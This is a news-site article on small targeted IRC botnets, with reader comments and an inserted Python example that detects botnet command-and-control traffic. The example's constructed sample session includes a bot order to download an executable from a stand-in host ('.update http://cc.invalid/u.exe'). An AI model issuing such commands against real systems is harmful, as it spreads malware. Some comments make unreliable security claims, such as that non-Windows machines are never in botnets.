Inside the botnets that never make the news - a gallery


Summary: If you ever wanted an inside view of targeted botnets, primarily run by novice cybercriminals sometimes using outdated but very effective methods, this ZDNet photo gallery is for you. It offers an inside view of those "beneath the radar" botnets that never make the news.


If you ever wanted an inside view of targeted botnets, primarily run by novice cybercriminals sometimes using outdated but very effective methods, this ZDNet photo gallery is for you.

It offers an inside view of those "beneath the radar" botnets that never make the news. The images have been collected throughout the past year using open source intelligence, namely by either joining the command and control IRC channel upon infection, or by monitoring ongoing communications between the botnet masters.
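The collection method described above relies on recognising an IRC session as botnet command and control rather than ordinary chat. The following is an added example, not code from the article or its author, of the heuristics a defender would apply to a captured IRC session transcript: generated-looking nicks, a keyed channel join, and dot-prefixed commands in the channel topic or messages. The session text, hostnames (on the reserved `.invalid` TLD) and command names are constructed for illustration, and the indicator names and scoring threshold are this example's own assumptions.

```python
import re

# Constructed sample IRC session (invented for this example, not a real capture):
# what traffic from a freshly infected host looks like when it registers with the
# server and joins the control channel. Hostnames use the reserved .invalid TLD.
SAMPLE_SESSION = """\
NICK [US|XP|48213]
USER svc 0 * :svc
:irc.cc.invalid 001 [US|XP|48213] :Welcome to the network
JOIN #ctl k3y
:irc.cc.invalid 332 [US|XP|48213] #ctl :.update http://cc.invalid/u.exe 1
:op!op@cc.invalid PRIVMSG #ctl :.sync 192.0.2.10 6667
:op!op@cc.invalid PRIVMSG #ctl :hello everyone
"""

# Constructed benign session for comparison: a human-looking nick and ordinary chat.
BENIGN_SESSION = """\
NICK alice
USER alice 0 * :Alice
:irc.chat.invalid 001 alice :Welcome to the network
:irc.chat.invalid 375 alice :- message of the day
JOIN #linux
:irc.chat.invalid 332 alice #linux :Welcome, please be nice
:bob!b@chat.invalid PRIVMSG #linux :anyone tried the new kernel?
"""

NICK_RE = re.compile(r"^NICK\s+(\S+)")
# Bot nicks are typically generated from country, OS and random digits, e.g. [US|XP|48213]
BOT_NICK_RE = re.compile(r"^[\[{]?[A-Za-z]{2,4}[|_-][A-Za-z0-9]{1,5}[|_-]\d{3,}[\]}]?$")
JOIN_RE = re.compile(r"^JOIN\s+(#\S+)(?:\s+(\S+))?")
TOPIC_RE = re.compile(r"^:\S+\s+332\s+\S+\s+(#\S+)\s+:(.*)$")  # RPL_TOPIC numeric reply
PRIVMSG_RE = re.compile(r"^:(\S+)!\S+\s+PRIVMSG\s+(#\S+)\s+:(.*)$")
# A dot- or bang-prefixed token at the start of a topic or message reads like a bot command
COMMAND_RE = re.compile(r"^[.!][A-Za-z][\w.]*\b")
URL_RE = re.compile(r"https?://\S+")


def analyse_irc_session(text):
    """Return (indicator, evidence) tuples found in a raw IRC session transcript."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = NICK_RE.match(line)
        if m:
            if BOT_NICK_RE.match(m.group(1)):
                findings.append(("bot_style_nick", m.group(1)))
            continue
        m = JOIN_RE.match(line)
        if m:
            # A channel key on JOIN means the channel is meant to keep outsiders out
            if m.group(2):
                findings.append(("keyed_channel_join", m.group(1)))
            continue
        m = TOPIC_RE.match(line)
        if m:
            # Bot herders commonly park the standing order in the channel topic
            if COMMAND_RE.match(m.group(2)):
                findings.append(("command_in_topic", m.group(2)))
            continue
        m = PRIVMSG_RE.match(line)
        if m and COMMAND_RE.match(m.group(3)):
            kind = "command_with_url" if URL_RE.search(m.group(3)) else "command_message"
            findings.append((kind, m.group(3)))
    return findings


def is_likely_cnc(findings, min_indicators=2):
    """Flag a session when at least min_indicators distinct indicator types fire."""
    return len({kind for kind, _ in findings}) >= min_indicators


if __name__ == "__main__":
    for name, session in (("sample", SAMPLE_SESSION), ("benign", BENIGN_SESSION)):
        found = analyse_irc_session(session)
        print(name, is_likely_cnc(found), found)
```

Requiring two distinct indicator types before flagging keeps a single odd nick or one keyed channel from triggering on legitimate traffic; the constructed botnet session fires four indicators, the benign one none.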

Why are small botnets so important anyway, and shouldn't we keep an eye on the big ones such as Conficker, Torpig or the rest of the eye-popping ones? Smaller botnets are usually underestimated; however, they're perfectly suitable for targeted attacks such as the recently exposed GhostNet espionage network. Moreover, despite the massive botnets run by sophisticated cybercriminals, evidence from the past (Storm Worm Hosting Pharmaceutical Scams; Money Mule Recruiters use ASProx's Fast Fluxing Services; Inside the Srizbi Botnet Business Model) clearly indicates that they're partitioning the botnets and reselling pieces of the pie to other cybercriminals, who then simply remove the original malware and introduce one of their own.

These small botnets are also exclusively used for some of the sophisticated managed spam services currently offered on the underground marketplace. For instance, the managed spamming service exclusively profiled by Zero Day last year was using only 5000 infected hosts for the purpose of sending 1 million spam messages. Another variation of it was offering only 1672 infected hosts, and was still capable of spamming 3215 emails per minute.

For the time being, the massive botnets we're used to seeing aren't going away, but in the long term the cybercriminals behind them could easily start splitting or partitioning them for operational security, and in order to avoid potential mass hijacking by competing cybercriminals or security researchers. The malicious economies of scale that cybercriminals achieve by standardizing the exploitation process also mean that their crimeware botnets are vulnerable to the logical monocultural insecurities.

What do you think?


Dancho Danchev

About Dancho Danchev

Dancho Danchev is an independent security consultant and cyber threats analyst, with extensive experience in open source intelligence gathering, malware and cybercrime incident response.


Talkback

90 comments
  • Botnets

    These are WINDOWS botnets. The article never says that. If you don't
    run windows your computer is not part of a botnet.

    Just stop using Windows on line. It is great for off line programs, but
    switch OS's to go on line.
    gertruded
    • Guess you missed...

      ... that article a few weeks back of a growing Apple Botnet? Do some research before spreading FUD. I'll help. Here's a few links for ya:

      http://blogs.zdnet.com/security/?p=3157
      http://www.itpro.co.uk/610552/zombie-macs-launching-botnet-attacks

      "The views expressed here are mine and do not reflect the official opinion of my employer or the organization through which the Internet was accessed."
      gnesterenko
      • You conveniently ignore...

        ... the fact that every one of those compromised
        machines was compromised by the user--downloading
        pirated and hacked software. Not a single machine using
        legal software is compromised... Yet.
        Vulpinemac
        • But....

          the same thing happens on Windows as well. You seem to believe that a fully patched and up to date PC will magically grow a botnet.

          And a lot of them are through social engineering.

          But I admit that some happen through infected web sites as well.
          Average-IT-Guy
          • Social Engineering

            "And a lot of [infections] are through social engineering."

            Exactly.

            It's been said many times, but it needs to be said again and again until people get it: These days, the biggest security vulnerability is probably the person operating the computer. And the truth is that the program has not yet been made that would protect people from their foolishness or willingness to engage in fisticuffs with primates for cash and fabulous prizes.

            Then again, maybe magical immunity to botnets is a secret feature of the RDF.
            Third of Five
        • i didn't ignore anything

          I was responding to this initial statement:

          "These are WINDOWS botnets. The article never says that. If you don't run windows your computer is not part of a botnet."

          Which is a false statement, per the articles cited. Nothing was said about how they were infected, just that they were.

          "The views expressed here are mine and do not reflect the official opinion of my employer or the organization through which the Internet was accessed."
          gnesterenko
          • But 9999 times out of 10,000 the problem IS on (because of) Windows [NT]

            -
            Mikael_z
    • ...

      And the fanboys start...
      TechBoyZ
      • 2 true...

        Windows this Mac that Linux rules... It is all about the users. Too many users are just clueless. And too many of those are in management...
        agohige
    • Windows Box as a Server?

      Ha ha ha.

      Why would the biggest-virus-magnet-ever-built be used as server?

      Are you people that ignorant?

      Yeah, why does this article not even mention that is about windowz boxes? (unprofessional)
      jrbeaman
    • Who is this fool?

      Since 2007, Impressive.
      This article was very disjointed. Not many facts, but a lot of key words.
      How about some facts? If we have a AV in place, what are our risks? Files to look for? Asshole!
      sfaid
  • RE: Inside the botnets that never make the news - a gallery

    gertruded is right. I see a lot about "computer viruses", when they are really Windows viruses. Identify the platform they damage, which is normally Windows.
    ator1940
    • Platform they damage?

      They don't damage any platform. This article is not a Mac>>>>>Windows>>>>>Linux piece. The damage is to people, to webservers (which are usually Linux, n'est-ce pas?), to people's information and such like that.

      Even then with it being windows...you know..which version of windows are they working on? Is it XP or Vista? What about Windows 7?

      Botnets will be targeted at the most popular OS, which is software incidentally. The platform is the hardware I would expect (on which all three OSs work happily). But I digress. If OSX was the most common OS then you'd find this article would be taken as directed at that OS. Same for Linux.

      So you pointing out that "Wah wah wah wah you don't say which OS" really seems very petty and quite stupid.

      Average-IT-Guy
      • very petty and quite stupid

        The standard Microsoft shill tactic on this board--always attack the
        person, not the unfavorable message.

        The fact is that if you are not running Windows then you are not part of a
        bot network. Even if the specious argument about Windows being
        attacked only because it is the most popular were true, the facts do not
        change.

        You are much safer on the internet if you use an OS other than Windows,
        much, much safer.
        gertruded
        • No Windoze = no software

          I do cross platform programming every day and the fact remains that if you are not running Windows you are shut out of 95% of all available software. If you are running Linux whole segments go completely uncovered. For example there is not a single decent audio editor out there (Audacity? - oh please) and no real video editor that doesn't crash every five minutes (There is only one real editor as it is).

          Try playing most of the latest games and you will find they do not run under Linux, Wine or not. DX 9 or 10 can no longer be emulated OpenGL.

          Hey, you are safe when you unplug the box. That is another solution. If you do a lot of diverse computing, Linux is not the answer. And yes, Macs are plenty infected, too.
          rernst99
          • You are right, but...

            At the medical office I work at, none of the business apps used for scheduling, billing, and patient records, work on either Linux, or Mac. And good luck finding ones that do. I cater to the Mac users here only because the Macs provide Windows through Boot Camp. Linux is nowhere to be found, save for the the occasional LiveCD I play around with. And that's the point. Sad though it may be, most every day use software is developed for Windows. Believe me, I would drop MS and their expensive BS licensing in a heartbeat if I could.
            daveaaa3
          • No medical apps for Mac?

            Funny both my doctor, and my dentist are all-Mac offices. I guess
            they
            must do without scheduling, billing, and patient record apps?

            I don't know what they use - but they are running in OS X, not
            Windows via boot camp.

            Not to distract from the botnet topic with further fanboi arguments
            one way or another. It just seems the argument that 95% of software is
            designed for Windows gets tossed around a lot. I work on Windows
            and OS X (and play a bit with Linux). And I don't find much missing on
            Mac at least, outside of the latest games. Which I seldom have time to
            play anyway.
            rx7racer
          • And it's this kind of captive Winbloze audience thinking...

            ...that keeps the bot-net boys happy.

            And yeah, I've used Audacity before. Great program. You obviously don't know how to use it.
            Wintel BSOD
        • not at all

          In fact it's been stated repeatedly in multiple articles that OSX is the single most vulnerable system out there, no matter what browser you are running. Including Firefox, because OSX has no layers of security technology for the browser to draw on. In fact, the safest way to browse is with Firefox on a Windows machine.

          And if you are still worried, install the NoScript addon for Firefox and you are immune to ANY web-based attack. Period. Not to mention it speeds browsing up significantly by preventing all non-essential scripts from loading. It's not just the OS you are running; it's the OS/browser combination that makes a difference.


          I should say that you aren't IMMUNE to any attack. No software prevents you from social engineering attacks. This is a given, of course, but I just thought I'd cover my tracks before the zealots set upon them.

          "The views expressed here are mine and do not reflect the official opinion of my employer or the organization through which the Internet was accessed."
          gnesterenko